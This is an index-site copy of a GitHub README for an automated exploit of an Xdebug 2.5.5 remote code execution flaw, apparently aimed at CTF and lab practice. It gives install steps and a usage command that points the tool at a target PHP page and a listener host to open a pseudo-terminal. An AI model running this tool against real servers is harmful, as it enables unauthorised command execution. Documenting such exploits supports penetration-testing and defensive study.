Data

Tools

Indexes

Applications

Experiments

Awesome

An open API service indexing awesome lists of open source software.

https://github.com/d3ext/xdebug-exploit

xdebug 2.5.5 RCE exploit
https://github.com/d3ext/xdebug-exploit

black-hat ctf exploit hacker hacking hackthebox kali mrrobot offensive-security oscp owasp php python rce vuln vulnerability xdebug xdebug-exploit

Last synced: about 1 month ago
JSON representation

xdebug 2.5.5 RCE exploit

Awesome Lists containing this project

README 

        
# xdebug 2.5.5 RCE



An automated POC exploit of the xdebug 2.5.5 RCE vulnerability



## Vulnerability



This vulnerability can be abused due to the eval command present in Xdebug versions 2.5.5 and below. This allows the attacker to execute arbitrary php code as the context of the web user.



## Installation



> Download from source

```sh

git clone https://github.com/D3Ext/xdebug-exploit

cd xdebug-exploit

pip3 install -r requirements.txt

python3 exploit.py

```



## Usage



Just execute the exploit and especify a valid URL with a PHP file like `index.php` and the local host. Then the exploit will try to establish a pseudo-terminal which allows you to execute commands



```sh

python3 exploit.py -u http://10.10.10.83/index.php -l 10.10.16.3

```



\* *In some cases the output won't be reflected at all and you will only see the first line of the executed command, this is not a problem of the script, the vuln works like this)*



## References



```

https://www.exploit-db.com/exploits/44568

https://www.tenable.com/plugins/nessus/112210

https://www.rapid7.com/db/modules/exploit/unix/http/xdebug_unauth_exec/

```



## Disclaimer



Use this exploit under your own responsability! The author is not responsible of any bad usage of it.



## License



This project is under [MIT](https://github.com/D3Ext/xdebug-exploit/blob/main/LICENSE) license



Copyright © 2025, *D3Ext*